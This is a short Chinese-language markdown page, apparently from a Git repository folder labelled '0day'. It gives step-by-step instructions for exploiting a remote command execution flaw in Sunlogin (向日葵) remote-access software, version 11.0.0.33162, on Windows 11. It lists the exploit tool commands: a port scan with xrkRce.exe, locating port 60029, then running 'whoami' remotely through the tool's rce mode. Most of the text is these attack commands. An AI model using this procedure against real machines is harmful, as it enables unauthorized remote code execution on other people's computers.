0day/18-向日葵远程命令执行/向日葵远程命令执行.md
2022-02-18 13:04:56 +08:00

449 B
Raw Blame History

向日葵版本Ver.11.0.0.33162

验证过程windows11

  1. 本机安装向日葵后启动软件;
    1
  2. CMD输入命令扫描端口判断是否可能存在Rce xrkRce.exe -h 192.168.99.38 -t scan -p 1-65535 2
  3. 可能存在会返回端口60029 3
  4. CMD输入命令xrkRce.exe -h 192.168.99.38 -t rce -p 60029 -c "whoami"),发现命令执行。 4